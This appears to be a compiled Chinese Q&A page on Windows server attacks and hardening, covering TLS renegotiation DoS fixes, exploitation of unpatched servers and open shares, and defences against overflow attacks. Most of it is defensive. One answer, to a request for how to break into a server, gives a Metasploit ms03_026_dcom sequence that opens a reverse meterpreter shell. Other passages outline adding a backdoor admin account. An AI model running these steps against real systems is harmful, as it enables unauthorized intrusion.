服务器攻击是什么意思_windows服务器攻击

如何修复windows10上出现的服务器支持 TLS Client-initiated 重协商攻击(CVE-2011-1473)漏洞。

使用SSL开启重协商的服务都会受该漏洞影响

该漏洞存在于SSL renegotiation的过程中。对于使用SSL重协商功能的服务都会受其影响。特别的，renegotiation被用于浏览器到服务器之间的验证。

虽然目前可以在不启用renegotiation进程的情况下使用HTTPS，但很多服务器的默认设置均启用了renegotiation功能。

该漏洞只需要一台普通电脑和DSL连接即可轻易攻破SSL服务器。而对于大型服务器集群来说，则需要20台电脑和120Kbps的 *** 连接即可实现。

SSL是银行、网上电子邮件服务和其他用于服务器和用户之间保护私人数据并安全通信必不可少的功能。所以本次拒绝服务漏洞影响范围非常广危害非常大。

一、Apache解决办法：

升级到Apache 2.2.15以后版本

二、IIS解决办法：

IIS 5.0启用SSL服务时，也会受影响。可以升级IIS 6.0到更高的版本。

三、Lighttpd解决办法：

建议升级到lighttpd 1.4.30或者更高,并设置ssl.disable-client-renegotiation = "enable"。

四、Nginx解决办法：

0.7.x升级到nginx 0.7.64

0.8.x升级到 0.8.23 以及更高版本。

五、Tomcat解决办法：

1、使用NIO connector代替BIO connector，因为NIO不支持重协商，参考如下配置：

Connector protocol="org.apache.coyote.http11.Http11NioProtocol"

（可能会影响Tomcat性能）；

2、配置Nginx反向 *** ，在Nginx中修复OpenSSL相关问题。

六、Squid解决办法:

升级到3.5.24以及以后版本

扩展资料：

分布式拒绝服务攻击可以使很多的计算机在同一时间遭受到攻击，使攻击的目标无法正常使用，分布式拒绝服务攻击已经出现了很多次，导致很多的大型网站都出现了无法进行操作的情况，这样不仅仅会影响用户的正常使用，同时造成的经济损失也是非常巨大的。

分布式拒绝服务攻击方式在进行攻击的时候，可以对源IP地址进行伪造，这样就使得这种攻击在发生的时候隐蔽性是非常好的，同时要对攻击进行检测也是非常困难的，因此这种攻击方式也成为了非常难以防范的攻击。

参考资料来源：百度百科--分布式拒绝服务攻击

您好，我想请教一下如何入侵windows服务器呢？？？

简单的nmap攻击（默认服务器开启135端口）先用上述nmap扫描目标主机信息，然后进入命令行

msfconsole

search ms03-026-dcom

use exploit/windows/dcerpc/ms03_026_dcom/

set PAYLOAD windows/meterpreter/reverse_tcp（选择工具）

set RHOST 192.168.1.10 //目标主机

set LHOST 192.168.1.11 //操作主机

exploit 执行命令

shell 得到目标shell，基本可以为所欲为了

如何防止黑客利用未打补丁的windows服务器作出攻击

当我们听到黑客这个词时，我们通常会想到复杂的神秘的技术，并且世界上只有少数人能够执行。然而这是一个误导，并且是当今黑客流行的一大因素。

实际上，服务器入侵没有那么复杂。黑客可能炫耀他们“疯狂的技能”，但这些人不是我们真正需要担心的。相反，通常是那些技术欠佳又作出错误判断的人会导致最多问题。事实上，这些人现在就存在于许多 *** 里，寻找可挖掘的漏洞。

当谈到保护Windows服务器阻止入侵时，我非常赞同首先聚焦在容易实现的目标。记住，这是每次难倒你的最基本的安全弱点。在以前的文章里，我介绍了出现Windows安全漏洞的一些原因。现在，我们看看在Windows服务器里两个常见的弱点，并描述它们是如何执行的。

缺失的补丁导致远程命令提示符

打补丁非常麻烦，你想多数Windows服务器能在补丁上作出更新。不过通常不是这么回事。不一致的补丁管理是造成Windows服务器弱点的更大因素。

下面是“黑客”如何利用未打补丁的Windows服务器作出攻击的步骤：

1.攻击者从外面或者(更常见地)在 *** 里运行免费的漏洞扫描工具，发现缺失的补丁。

2.攻击者确认可以使用免费的Metasploit工具挖掘这个弱点。

3.攻击者启动Metasploit并获得远程命令提示符。

4.攻击者设置一个后门用户账户并将他们自己添加到本地管理员组。

5.攻击者对系统拥有完全访问权，如本地登录、远程桌面、VPN等。其他人都不会注意到他们的存在。

不安全的 *** 共享导致未授权的文件访问

在 *** 上共享文件是Windows服务器的基本功能之一。不过，这也是个致命弱点，使得所谓“受信任”的用户能够不经授权访问。有时候员工出于无聊、好奇或报复在Windows Explorer里点击，并会偶然发现他们应该不能访问的敏感信息。

下面是“黑客”利用不安全的Windows共享作出攻击的步骤：

1.攻击者在 *** 里运行免费的共享扫描工具(如GFI LANguard)，发现Windows服务器上的众多共享信息，多数信息恰好对每个人都拥有完全控制授权。

2.攻击者通过点击这些共享找到他们所需的信息。

3.攻击者可能偶然发现一些敏感信息或者能下载和安装免费的本文搜索工具，如FileLocator Pro。

4.攻击者在本文搜索工具里插入一些关键字，如能表示敏感信息的“密码”、“SSN”或者“confidential”。

5.攻击者找到微软Excel电子表格、Word文档、PDF文件和数据库，里面都是敏感员工的资料和客户信息，能用于非法目的。再次重申，可能没有人会发现这些行为。

有了足够多的“sticktuitiveness”，攻击者能在Windows服务器、薄弱的SQL Server配置和基于IIS配置的服务器上发现缺失或简单的密码，通过匿名FTP共享整个驱动等。如果可以访问物理服务器，攻击者能使用包含 Ophcrack或Elcomsoft System Recovery的CD重新启动Windows服务器。然后他们能获得对所有用户账户和密码的完整访问，包括Active Directory file ntdis.dit。整个Windows环境都被暴露了，并且无人会发现。

对于外部的黑客或恶意的内部人员，在Windows服务器上有许多弱点能挖掘。只要有足够的时间，他们就能成为黑客。你的任务就是找到这些弱点，在别人进行攻击之前做好防护措施

windows服务器远程密码复杂还是被攻击了

您的 Windows 服务器的远程密码可能是被攻击了。建议您采用复杂的密码策略，包括使用长度至少 8 位的密码，使用大写字母、小写字母、数字、符号，以及每隔一定时间定期更改密码。

基于Windows服务器溢出 攻击 有哪些

在频频恶意攻击用户、系统漏洞层出不穷的今天，作为 *** 治理员、系统治理员虽然在服务器的安全上都下了不少功夫，诸如及时打上系统安全补丁、进行一些常规的安全配置，但有时仍不安全。因此必须恶意用户入侵之前，通过一些系列安全设置，来将入侵者们挡在“安全门”之外，下面就将最简单、最有效的防(Overflow)溢出、本地提供权限攻击类的解决办法给大家分享。

一、如何防止溢出类攻击

1、尽更大的可能性将系统的漏洞补丁都打完，更好是比如Microsoft Windows Server系列的系统可以将自动更新服务打开，然后让服务器在您指定的某个时间段内自动连接到Microsoft Update网站进行补丁的更新。假如您的服务器为了安全起见 禁止了对公网外部的连接的话，可以用Microsoft WSUS服务在内网进行升级。

2、停掉一切不需要的系统服务以及应用程序，更大限能的降底服务器的被攻击系数。比如前阵子的MSDTC溢出，就导致很多服务器挂掉了。其实假如WEB类服务器根本没有用到MSDTC服务时，您大可以把MSDTC服务停掉，这样MSDTC溢出就对您的服务器不构成任何威胁了。

3、启动TCP/IP端口的过滤，仅打开常用的TCP如21、80、25、110、3389等端口;假如安全要求级别高一点可以将UDP端口关闭，当然假如这样之后缺陷就是如在服务器上连外部就不方便连接了，这里建议大家用IPSec来封UDP。在协议筛选中"只答应"TCP协议(协议号为：6)、UDP协议(协议号为：17)以及RDP协议(协议号为：27)等必需用协议即可;其它无用均不开放。

4、启用IPSec策略:为服务器的连接进行安全认证，给服务器加上双保险。如③所说，可以在这里封掉一些危险的端品诸如:135 145 139 445 以及UDP对外连接之类、以及对通读进行加密与只与有信任关系的IP或者 *** 进行通讯等等。(注:其实防反弹类木马用IPSec简单的禁止UDP或者不常用TCP端口的对外访问就成了,关于IPSec的如何应用这里就不再敖续，可以到服安讨论Search "IPSec"，就 会有N多关于IPSec的应用资料..)

5、删除、移动、更名或者用访问控制表列Access Control Lists (ACLs)控制要害系统文件、命令及文件夹：

（1）.黑客通常在溢出得到shell后，来用诸如net.exe net1.exe ipconfig.exe user.exe query.exe regedit.exe regsvr32.exe 来达到进一步控制服务器的目的如:加账号了，克隆治理员了等等;这里可以将这些命令程序删除或者改名。(注重:在删除与改名时先停掉文件复制服务(FRS)或者先将 %windir%\system32\dllcache\下的对应文件删除或改名。)

（2）.也或者将这些.exe文件移动到指定的文件夹,这样也方便以后治理员自己使用。

（3）.访问控制表列ACLS控制：找到%windir%\system32下找到cmd.exe、cmd32.exe net.exe net1.exe ipconfig.exe t user.exe reg.exe regedit.exe regedt32.exe regsvr32.exe 这些黑客常用的文件，在“属性”→“安全”中对他们进行访问的ACLs用户进 行定义，诸如只给administrator有权访问，假如需要防范一些溢出攻击、以及溢出成功后对这些文件的非法利用，那么只需要将system用户在ACLs中进行拒绝访问即可。

（4）.假如觉得在GUI下面太麻烦的话，也可以用系统命令的CACLS.EXE来对这些.exe文件的Acls进行编辑与修改，或者说将他写成一个.bat批处理 文件来执行以及对这些命令进行修改。(具体用户自己参见cacls /? 帮助进行，由于这里的命令太多就不一一列举写成批处理代码给各位了!!)

（5）.对磁盘如C/D/E/F等进行安全的ACLS设置从整体安全上考虑的话也是很有必要的，另外非凡是win2k，对Winnt、Winnt\System、Document and Setting等文件夹。

6、进行注册表的修改禁用命令解释器: (假如您觉得用⑤的 *** 太烦琐的话，那么您不防试试下面一劳永逸的办法来禁止CMD的运行，通过修改注册表，可以禁止用户使用命令解释器(CMD.exe)和运行批处理文件(.bat文件)。具体 *** :新建一个双字节(REG_DWord)执行 HKEY_CURRENT_USER\Software\PolicIEs\ Microsoft\Windows\System\DisableCMD，修改其值为1，命令解释器和批处理文件都不能被运行。修改其值为2，则只是禁止命令解释器的运行,反之将值改为0，则是打开CMS命令解释器。假如您赚手动太麻烦的话,请将下面的代码保存为*.reg文件，然后导入。

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System]

"DisableCMD"=dword:00000001

7、对一些以System权限运行的系统服务进行降级处理。(诸如:将Serv-U、Imail、IIS、Php、Mssql、Mysql等一系列以System权限运行的服务或者应用程序换成其它administrators成员甚至users权限运行，这样就会安全得多了...但前提是需要对这些基本运行状态、调用API等相关情况较为了解. )

其实，关于防止如Overflow溢出类攻击的办法除了用上述的几点以外，还有N多种办法:诸如用组策略进行限制，写防护过滤程序用DLL方式加载windows到相关的SHell以及动态链接程序之中这类。当然自己写代码来进行验证加密就需要有相关深厚的Win32编程基础了，以及对Shellcode较有研究;由于此文仅仅是讨论简单的解决办法，因此其它办法就不在这里详述了。